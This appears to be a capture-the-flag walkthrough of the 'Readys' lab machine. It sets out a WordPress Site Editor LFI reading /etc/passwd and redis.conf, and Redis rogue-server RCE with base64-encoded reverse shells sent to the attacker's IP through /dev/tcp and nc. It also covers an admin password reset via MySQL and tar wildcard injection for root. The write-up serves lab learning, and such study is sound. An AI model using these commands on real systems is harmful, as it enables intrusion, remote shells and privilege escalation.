Readys
Enumeration
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.7.2
|_http-title: Readys – Just another WordPress site
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
6379/tcp open redis Redis key-value store$ wpscan --url http://192.168.147.166/ --api-token [REDACTED]
...
[+] site-editor
| Location: http://192.168.147.166/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: http://192.168.147.166/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.147.166/wp-content/plugins/site-editor/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - https://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
https://www.exploit-db.com/exploits/44340
** Proof of Concept **
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd$ redis-cli -h 192.168.147.166
192.168.147.166:6379> info
NOAUTH Authentication required.
/etc/redis/redis.conf
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf
requirepass [REDACTED]Initial Access
Redis 4x-5x RCE
$ git clone https://github.com/vulhub/redis-rogue-getshell.git
$ cd redis-rogue-getshell
$ cd RedisModulesSDK
$ make
$ cd ..
$ python3 redis-master.py -r 192.168.147.166 -p 6379 -L 192.168.49.147 -P 80 -f RedisModulesSDK/exp.so -a "[REDACTED]" -c "id"
uid=107(redis) gid=114(redis) groups=114(redis)
# Reverse Shell
/bin/bash -i >& /dev/tcp/192.168.49.147/8080 0>&1 - Base64 Encoded
$ python3 redis-master.py -r 192.168.147.166 -p 6379 -L 192.168.49.147 -P 80 -f RedisModulesSDK/exp.so -a "[REDACTED]" -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDkuMTQ3LzgwODAgMD4mMQ== | base64 -d > /tmp/evil.sh"
$ python3 redis-master.py -r 192.168.147.166 -p 6379 -L 192.168.49.147 -P 80 -f RedisModulesSDK/exp.so -a "[REDACTED]" -c "bash -p /tmp/evil.sh"Lateral Movement
/** MySQL database username */
define( 'DB_USER', 'karl' );
/** MySQL database password */
define( 'DB_PASSWORD', '[REDACTED]' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
redis@readys:/var/www/html$ mysql -u karl --password=[REDACTED] -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
# admin:hackedPrivEsc
alice@readys:/$ cat /etc/crontab
*/3 * * * * root /usr/local/bin/backup.sh
alice@readys:/$ ls -lh /usr/local/bin/backup.sh
-rwxr-xr-x 1 root root 122 Nov 17 12:36 /usr/local/bin/backup.sh
#!/bin/bash
cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fiThere is a wildcard usage.
alice@readys:/$ cd /var/www/html
# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.49.147 80 >/tmp/f - Base64 Encoded
alice@readys:/var/www/html$ echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjQ5LjE0NyA4MCA+L3RtcC9m | base64 -d > shell.sh
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1Last updated